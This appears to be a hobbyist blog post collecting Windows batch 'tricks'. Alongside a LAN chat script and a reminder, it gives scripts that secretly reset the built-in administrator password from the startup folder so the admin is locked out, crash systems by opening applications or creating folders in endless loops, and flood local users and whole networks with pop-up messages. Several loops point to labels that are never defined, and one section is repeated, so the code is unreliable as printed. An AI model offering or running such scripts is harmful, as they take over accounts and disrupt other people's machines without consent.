Simple tricks with batch with LAN chatting...
IP Messenger:
The ‘IP Messenger’ works similar to a LAN chat application there by offering the users to chat textually within the same network. The hostname of the recipient is good enough to chat with them.@echo off
color a
echo ########## LAN CHAT ##########//replace what ever you want here//
echo Type in the hostname of the recipient in the User: Field
echo Enter the Message you wanna convey to the recipient in the Message: Field
set /p n=User:
set /p m=Message:
net send %n% %m%
Goto loop
Copy and paste the above program in a notepad file and save it as a batch file, you will be getting a pop up windows that exactly looks like below screenshot, when you execute the batch file
As everyone is aware that windows operating system consists of a built-in administrator account, which has got all the privileges on that particular machine, we are going to use a simple batch program to change the password for that built-in administrator account,
@echo off
Net users administrator p@$$w0rd
When this batch file is kept in the startup folder of the administrator account, then it will automatically change the password for the administrator account to ‘p@$$w0rd’ at the next login, and if the admin is not aware of this, then he might suffer at the time while trying to login the next time.
Admin Password Changer:
As everyone is aware that windows operating system consists of a built-in administrator account, which has got all the privileges on that particular machine, we are going to use a simple batch program to change the password for that built-in administrator account,@echo off
Net users administrator p@$$w0rd
When this batch file is kept in the startup folder of the administrator account, then it will automatically change the password for the administrator account to ‘p@$$w0rd’ at the next login, and if the admin is not aware of this, then he might suffer at the time while trying to login the next time.
Setting an Interactive Reminder:
By using a batch program you can set a reminder for yourself in your computer, so that it will remind you with a pop up message, sound, greetings or whatever at the exact same time when you want it to remind you. This is scheduled using the ‘at’ command that we have already seen,
Say, if I want my computer to remind me at 10:00AM on 13th May 2009, so that I can participate in the Security Conference, I have designed a custom greeting by myself,
And named it as ‘remindme.jpg’ and placed it in C drive (C:\remindme.jpg), then I have used the following batch to schedule this greeting to pop up exactly at 9:30AM 13th May which is half-an hour before the conference,
@echo off
title Reminder
C:\>at 09:30AM /next:W "C:remindme.jpg"//WHAT EVER YOU WANA KEEP AS PICTURE//
It was a Wednesday on may 13th, hence I have used the switch ‘/next:W’ indicating that it was a Wednesday. This program will pop up the greeting that was shown above, exactly at 9:30AM on may 13th, reminding me to attend the conference, more over I must be in front of my computer, working with it, only then it the reminder will pop up else, its mere waste of time doing this
Application Bomber:
Application bomber is a superset of window bomber, this has a close relation to the above given fork bomber program, where in this ‘application bomber’ we don’t call the program using the name itself (simply known as fork), where as we are going to open up applications continuously using a loop.
@echo off
start notepad
start winword
start mspaint
start write
start cmd
start explorer
start control
start calc
goto loop
When the above given batch program is executed, it will open up the following applications such as notepad, word document, Microsoft paint, WordPad, command prompt, my documents, control panel, and calculator in an infinite loop causing the system to collapse and as a result the system simply crashes or reboots. Just imagine the same using a fork concept; oops! it will make the system crash immediately.
Msg Annoyer:
Message annoyer is a batch program that uses the same concept as above, but will interact with the user anyhow annoying and irritating them by popping up some message box containing some messages in it.
@echo off
msg * Hi there!
msg * How u doin ?
msg * Are you fine ?
msg * Never mind about me....
msg * I am not here to annoy you....
msg * I am caring for you.....
msg * start counting from 1 to 5, i Will be outta this place.....
msg * 1
msg * 2
msg * 3
msg * 4
msg * 5
goto annoy
Containing the text mentioned in the program given above.
This message box will pop up until for endless loop, which really annoys the person sitting before the computer. Even these small popup windows may crash the computer, if it overloads the memory
Matrix Folder flooder:
The following piece of code is going to help flood you computer with junky folders. This program has the tendency to create more than 3000 folders in just less than a minute.
@echo off
mkdir %random%
goto loop
Here I have enclosed the screenshot took while I was testing this code on my computer.
Broadcast Bomber:
The ‘broadcast bomber’ will broadcast messages infinitely to all the computers connected to this computer, if it is in a network. Likewise the ‘msg flooder’ program that we have seen already, this helps people to annoy multiple people sitting and working in front of various other computers connected with the same network.
@echo off
net send * Hi there!
net send * How u doin ?
net send * Are you fine ?
net send * Never mind about me....
net send * I am not here to annoy you....
net send * I am caring for you.....
net send * start counting from 1 to 5, i Will be outta this place.....
net send * 1
net send * 2
net send * 3
net send * 4
net send * 5
goto netannoy
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